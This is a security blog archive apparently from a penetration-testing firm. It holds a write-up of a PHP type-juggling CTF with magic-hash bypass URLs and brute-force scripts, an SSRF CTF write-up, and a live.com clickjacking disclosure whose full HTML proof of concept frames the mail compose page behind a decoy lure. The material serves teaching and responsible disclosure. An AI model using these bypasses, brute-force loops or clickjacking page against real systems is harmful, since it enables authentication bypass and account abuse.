Drupal 8.0.0-beta14 Vendor Script Vulnerable to XSS

September 5, 2015

Overview

Recently, I was playing around with the Drupal CMS application code. Drupal is an open source CMS application widely used for blog posting purpose, Further details, to know more about Drupal
here. Open source application advantage being, the source code was at my disposal.

While fiddling around with the core Drupal Vendor Package I stumbled upon a very interesting vulnerability of XSS. Now the idea was to see how exactly an attacker can exploit this particular XSS to impact Drupal users at large.
So let me walk you through the technical process of discovery and impact assessment for the Drupal source code audit which lead to the discovery of XSS which can be used to hijack drupal accounts or to perform other malicious activity by an attacker.

Read more here : http://blog.securelayer7.net/core-drupal-8-0-0-beta14-xss-attack/

Thank you for reading my blog

We Provide Penetration Testing

Malware Detection : Adding glastopf juice to maldet engine

September 4, 2015

At SecureLayer7, we continuously try to keep our customers updated with the latest threats which could affect their infrastructure and help them to secure their perimeter. More than often we devise attack scenarios and then brainstorm to block such attempts. During one such brainstorming session, we took a interesting detour to check a couple of our ideas.

For more detail : http://blog.securelayer7.net/malware-detection-adding-glastopf-juice-to-maldet-engine/

 

Thank you for reading :-)

We Provide Penetration Testing

CVE-2015-2652 – Unauthenticated File Upload in Oracle E-business Suite.

July 15, 2015

Hi,

I’ve posted completes Details about CVE-2015-2652 – Unauthenticated File Upload in Oracle E-business Suite on the following company link.

http://blog.securelayer7.net/cve-2015-2652-unauthenticated-file-upload-in-oracle-e-business-suite/

 

– S

We Provide Penetration Testing

SSRF/XSPA (Web Application Vulnerability) CTF Write up- Garage4Hackers

June 23, 2015

The last time we organized CTF based on web application vulnerability i.e SSRF / XSPA. For those who are new to SSRF, please go through this slide http://www.slideshare.net/d0znpp/ssrf-attacks-and-sockets-smorgasbord-of-vulnerabilities.

Just for the record next G4H Ranchoddas Webcast on Mobile Application and registration is open.

You can find CTF source code here: https://github.com/sandeepl337/Garage4hackers-March-2015-CTF-SSRF-XSPA .

On the CTF server we are running Internal application on port 80 and external application. The mission of the CTF was finding flag from the PHP file.   The vulnerable external application is used to extract the title of any website.

Following Write up from Hai Au Huynh:

—— START ——

Firstable, put into url parameter “foobar”, we got “Caught exception: _(asfsafindex.php): failed to open stream: No such file or directory”=> the application parse our input as file and reading it.

So, it’s clear that next step we need to read the source code of application, we put into url parameter “index.php” and get the index.php source code.

The code is going to do something like this:
include(‘include/extractTitleLogic.php’);
Get the contents of url parameter input, if it has tittle tag, print out the title, if not print out the contents of input With the include/extractTitleLogic.php disclosure, we try to read the contents of include/extractTitleLogic.php but it contains the title tag, so we cannot read it. But fortunately, the include/index.php does
not, so we can read it out.

In source code of include/index.php, we get “// “The feeling that conversations and any data (whiteboard included)
are encrypted without having to mess around with complicated options and setup is a massive plus. It’s very very easy to use.” –
zorgalicious
// //  You Found key! w00t!! :)
// Decrypt Blowfish following code and send CTF Flag to following email
//   49FE06DB9909C6FC6AE11D44F12CD39F659690A388F660A13709CDFA7F06A0E9343E9058EADB9A4CE9AE4F2BC2585768″

The first quote seems very make sense, so we try to search for it, and it leads to this
http://www.bitwiseim.com/features.php?f=Encryption&Presentation=Mac.
So at this time, it’s very clearly that we can decrypt the Blowfish message at that site, and get the flag: Garage4Hacker Private Key:
0x33331337

—— END ——

 

We Provide Penetration Testing

Writeup on Garage4Hackers Xmas / Dec Web Challenge 2014

December 10, 2014

Ho Ho Ho, Xmas challenge ended. This challenge was all about of bypassing login authentication. Obviously, it was funny challenge!! And the obvious reason was password md5 hash. A footnote was there in source code.

Code:
<!--
    We are so generous, see we provided you password hash to login :) 0e100132199235687421930375421091
    if(0e100132199235687421930375421091 == md5($_GET['pass']))
    {
      // Simple PHP CODE Logic
    }
  ?> -->

Garage4Hackers Xmas Challenge is developed into PHP and it available to download for learning purpose.

Just a quick note: If you want to join G4H CTF team, then you PM me and checkout our last month Ranchoddas event

And I’m back to business, The main purpose of the CTF is to understand the PHP equal to (==) operator for comparing and even you can study strcmp function. If a developer uses equal to (==) operator without measuring the risk, then it can be profitable for attacker. However, attack can be carried in rare cases only. we’ve received some expected result and some unexpected results but at the end both are results

There was 4k + unique Hits on the CTF page in 24 Hrs, only few submission we’ve valid received.

Following is list of ninja, who solved the challenge in the time.

Code:
jinmo123  - Good Solution but not expected
tlk ( https://twitter.com/tlk___ ) - Nice Solution, but Not expected
stypr (https://stypr.com) - W00tt , expected solution
Ajin Abraham - Nice Solution, but Not expected
sagar popat  - Nice Solution, but Not expected
Sharath Unni - W00tt , expected solution

There was three way to solve this CTF and expected way to solve the challenge is to bypass authentication by using PHP equal to (==) operator. Brute forcing username is second easy way to solve the challenge and last way was monkey testing. ( Just kidding )

PHP CTF Code:

Code:
<?php
error_reporting(0);
$a = htmlentities($_GET['username']);
$c = htmlentities($_GET['password']);
$b = md5($c);
if (!empty($a) AND !empty($b)) { // empty function made this CTF more easy
 if ("0e100132199235687421930375421091" == $b) { // vulnerable line
    if ($b ==="0e100132199235687421930375421091") {  // To Avoiding some bugs and change behavior of CTF
     if ("133E-1337" === $a) {// To Avoiding some bugs and change behavior of CTF
        print "Flag : Garage4H4x0rFlagPhpFlag1337";
      }else{
        print "umm!! nice try dude :), oops! you don't know username";
      }
    }else{
      if ($a ==="0e100132199235687421930375421091") {// To Avoiding some bugs and change behavior of CTF
       print "umm!! nice try dude :), oops! ";
      }else{
        if ("133E-1337" == $a) { // vulnerable line
          print "Flag : Garage4H4x0rFlagPhpFlag1337";
        }else{
          Print "Wrong Username";
        }
    }
      }
  }else{
    Print "wrong  Password";
  }
}
?>

Here is some story about PHP operator and expected Behavior of PHP equal to operator.

Code:
Input       | Output
-------------------------
"0" == "0" | True
"1" == "0" | False
-------------------------

Unexpected Behavior of PHP equal to operator.

Code:
Input       | Output
-------------------------
"0e1" == "0" | True
-------------------------

In detailed :
PHP consider it as scientific notation 0e1 = 0 * 10 ^ 1 and ANS is 0

Code:
 <?php
   var_dump("0e1" == 0);
 ?>
Code:
Finding entry points
Branch analysis from position: 0
Return found
filename:       /in/Pvj4s
function name:  (null)
number of ops:  4
compiled vars:  none
line     # *  op                           fetch          ext  return  operands
---------------------------------------------------------------------------------
   2     0  >   IS_EQUAL                                         ~0      '0e1', 0
         1      SEND_VAL                                                 ~0
         2      DO_FCALL                                      1          'var_dump'
         3    > RETURN                                                   1

Here is the fun start, this is just plain text comparison and check out the following MD5 Hash, and most of developer use it as passwords.

Code:
var_dump(0e100132199235687421930375421091 == md5(urldecode('%02%a27%84')));
 bool(true) // w00t :)

Another string :

Code:
'\x98-\xde\x1f'

// Submission by Beched (@ahack_ru)

try here : http://3v4l.org/NK5hp

In our check was too simple to bypass, because we haven’t put quotes around the hash. It made it to be integer, which causes expression to be true with any hash, which does not start with [1-9].

Here is bypass if we use quote around hash:

Code:
php > var_dump('0e100132199235687421930375421091'==md5("\x0e\xd7\xb6\xea"));   // Submission by Beched (@ahack_ru)
bool(true)

Try here : http://3v4l.org/M9dpY

Here is another simple example, which can be found on the internet.

Code:
http://3v4l.org/2vrMi

While testing this CTF there is MD5 collision found by Sharath Unni

Code:
0e100132199235687421930375421091 (Found in HTML source code )
0e104142395260374396839196939683 (MD5 collision )

Both these hashes have the same plaintext equivalent: 26177715789 , you can decrypt MD5 here

Code:
 http://www.md5online.org/

.

This was all about PHP Equal operator, now what is solution of this CTF.

Here is solution and you find many more ways:

Code:
http://162.208.48.16/?username=0e57640477961333848717747276704&password=BRTKUJZ&submit=Login&debug=true
http://162.208.48.16/?username=0e1&password=NOOPCJF&submit=Login&debug=true
http://162.208.48.16/?username=0e2&password=26177715789&submit=Login&debug=true

Submission by jinmo123

Code:
http://162.208.48.16/?username=000&password=240610708&submit=Login#

Submission by tlk ( https://twitter.com/tlk___ )

Brute Force Script:

Code:
import requests
s = requests.session()
for i in range(255):
    r = s.get("http://162.208.48.16/?username="+chr(i)+"&password=QNKCDZO&submit=Login")
    print len(r.content), chr(i), i, "Wrong Username" in r.content
We can see that only #, & and 0 not contains "Wrong Username". let's try to prepend '0' :
    r = s.get("http://162.208.48.16/?username=0"+chr(i)+"&password=QNKCDZO&submit=Login")
Code:
http://162.208.48.16/?username=0.0&password=QNKCDZO&submit=Login

Two Submission by stypr (https://stypr.com)

Code:
http://162.208.48.16/?username=0e57640477961333848717747276704&password=BRTKUJZ&submit=Login&debug=true
http://162.208.48.16/?username=0x00&password=BRTKUJZ&submit=Login&debug=true

Submission by Ajin Abraham

Code:
import urllib2
with open("10k most common.txt","r") as f:
    url='http://162.208.48.16/?username=[X]&password=26177715789'
    no=0
    for line in f:
        turl=url.replace("[X]",line).replace("\n","").replace("\r","")
        response = urllib2.urlopen(turl)
        html = response.read()
        dat=html[:50]
        no+=1
        log= str(no)+" Username: "+ line +"Response: "+ dat
        if ("Wrong" in log):
            print no
        else:
            print log
response.close()
Code:
URL:http://162.208.48.16/?username=-0&password=26177715789

Submission by Sagar Popat

Code:
http://162.208.48.16/?username=00&password=26177715789&submit=Login

Submission by Sharath Unni

Code:
http://162.208.48.16/?username=0e12323&password=26177715789&submit=Login

Thats all for today Thank you for reading .

We Provide Penetration Testing

Garage4Hackers Ranchoddas Webcast Series – Browser Crash Analysis By David Rude II aka Bannedit

April 17, 2014

 

Check out Recordings of Browser Crash Analysis By David Rude II aka Bannedit

We Provide Penetration Testing

UI redress attack on live.com (affected all pages).

On 7/29/13 I’ve reported Live.com XFO vulnerability to the Microsoft Security team and finally their investigation came to conclusion and fixed the bug. So, Here is details of bug and timeline of fixing bug. A year ago on the weekend, I started digging into MS services for bugs and this vulnerability seems to be more interesting to share on the Garage4Hackers.

The timeline of investigation of the bug : July 29, 2013 – April 16 , 2014.

Name:  msresponse.jpg
Views: 0
Size:  23.1 KB

The interesting part of the vulnerability all pages were protected for UI Addressing Attack and while doing testing, normally I test application on the all browsers. The weird part comes here, I was able to iframe the all the pages of Live.com including pre-authentication and post-authentication pages on Mozilla Firefox 3.6.28 to Mozilla Firefox 6. On Chrome and on other browser all pages functionality of XFO was working perfectly.

Random announcement , nothing do with this post : Check out recorded video of Garage4Hackers Ranchoddas Webcast Series – Browser Crash Analysis By David Rude II aka Bannedit
Note : Have look the same vulnerability on Facebook Application Installing

Obviously , you must be thinking why this thing is happening with Mozilla. After doing some research and consulting with G4H team , I’ve concluded, it may be issue with Gecko Engine. The test environment was win 7 , ubuntu 10,11,12.
Note : If you stumbled upon on the same issue of Gecko, then please do reply on this thread.

Check out the following headers , XFO header is missing on Gecko/20120306 Firefox/3.6.28 to MF 6.

Code:
        https://blu166.mail.live.com/m/?bfv=wm

        GET /m/?bfv=wm HTTP/1.1
        Host: blu166.mail.live.com
        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip,deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Keep-Alive: 115
        Connection: keep-alive
        Cookie:

        HTTP/1.1 200 OK
        Content-Type: text/html; charset=utf-8
        Content-Encoding: gzip
        Vary: Accept-Encoding
        Server: Microsoft-IIS/7.5
        X-Wlp-StartTime: 29-07-2013 10:10:32 AM
        xxn: 22
        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
        MSNSERVER: H: BLU166-W22 V: 17.1.6722.6001 D: 2013-07-22T22:56:20
        X-Powered-By: ASP.NET
        Content-Length: 3113
        Date: Mon, 29 Jul 2013 10:10:32 GMT
        Connection: keep-alive
        Set-Cookie: bfv=wm; domain=.live.com; path=/
        Set-Cookie: widecontext=X; path=/; secure
        Set-Cookie: domain=.live.com; path=/
        Set-Cookie: xidseq=7; domain=.live.com; path=/
        Set-Cookie: LD=; domain=.live.com; expires=Mon, 29-Jul-2013 08:30:32 GMT; path=/
        Cache-Control: no-cache, no-store, must-revalidate, no-transform
        Pragma: no-cache
        Expires: -1, -1

Here is some print screen of basic operations of live.com (I would like to remind you , every page of live.com was vulnerable )

Attacker developed this page to attack on victim.

Composing Email :

Uploading Attachment :

Deleting Emails :

[IMG]https://dl.dropboxusercontent.com/u/18007092/ms-click4.png[IMG]

HTML POC , which i used sent to MS Security Team

Code:
<html>
<!-- This Quick Developed POC , for testing purpose --!>
<!-- Visit Garage4hackers.com  --!>
<head>
	<title> Live Mail Send Clickjacking - Garage4hackers.com </title>
	<style>
		iframe { 
		  width:800px;
		  height:800px;
		  position:absolute;
		  top:0; left:0;
		  filter:alpha(opacity=50); /* in real life opacity=0 */
		  opacity:0.5;
		}
	</style>
</head>
<body>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
<div><center>Bhag Milkha Bhag Competition</center></div>
<center><b>Click Connect, You will Bhag Muilkha Bhag T-shirts. </b></center>

    <iframe src="https://blu166.mail.live.com/m/compose.m/?fid=00000000-0000-0000-0000-000000000001&to=sandeepk.l337@gmail.com"></iframe>
	<a href="http://www.google.com" target="_blank" style="position: relative; left: 0px; top: 220px; z-index: -1;">Connect</a>

</body>
</html>

Let me know if you have any question about this bug

– [S]

We Provide Penetration Testing

After the 9 Month of Investigation Microsoft Security Team Fixed Bug

March 18, 2014

Yesterday night , while garage4hackers ranchoddas event was running. I’ve received a message from Microsoft Security Team with following statement. In regard, one vulnerability on multiple pages[Near about all pages of live] of Live.com / hotmail.com [Mobile version]

Microsoft Vulnerability

I hope they fix this very soon and I’ll share more details on the bug on Garage4hackers.com

Thank You
Sandeep

We Provide Penetration Testing

Garage4hacker’s Ranchoddas Series 2 of Reverse Engineering

other a lot of technical problems we’re done! Thank you for the patience! I will re-record this and post on youtube in a few days and garage4hackers.com

Thank you

We Provide Penetration Testing

Data, data, data! I can’t make bricks without clay by Gynvael Coldwind – Google Security Engineer and Dragon Sector Team Captain.

Dear all,
Garage4Hacker invites you to join us for a webinar titled Data, data, data! I can’t make bricks without clay by Gynvael Coldwind – Google Security Engineer and Dragon Sector Team Captain.

For Registration, please fill the following form.
https://docs.google.com/forms/d/1L3-…RlNdI/viewform

Reverse Engineering is an art more than science. From the realms of vulnerability discovery to debugging for internals, reverse engineers are a rare breed with the ability to think backwards in the chain of events. Discovering the technological principles of a device, object, or system through analysis of its structure, function, and operation. With the growth of exploit development and rise of malware attacks, reverse engineering is becoming a key area to study.

==UPDATE==
Video stream: https://plus.google.com/events/c2puj…m01lo615eio8a8 or http://www.garage4hackers.com/pages.php?pageid=4
Questions / chat: #g4h @ irc.freenode.org (or via web: http://www.garage4hackers.com/pages.php?pageid=3)
–UPDATE–

What to expect:
The presentation would revolve more around the approaches taken in RE than usage of tools. It will be focused on various practical tips and tricks that can speed up the process of reverse-engineering. The presented information will not be strictly tied to any specific platform or tool – most of it can be applied on any architecture or operating system.

Examples of topics:
– how to start with an unknown architecture
– debugger scripting
– creating your own useful tools
– etc

Prerequisites:
– some reverse-engineering experience or general interest in reverse-engineering
– basic programming skills
– basic knowledge of how the CPU and operating systems work

We Provide Penetration Testing


We Provide Penetration Testing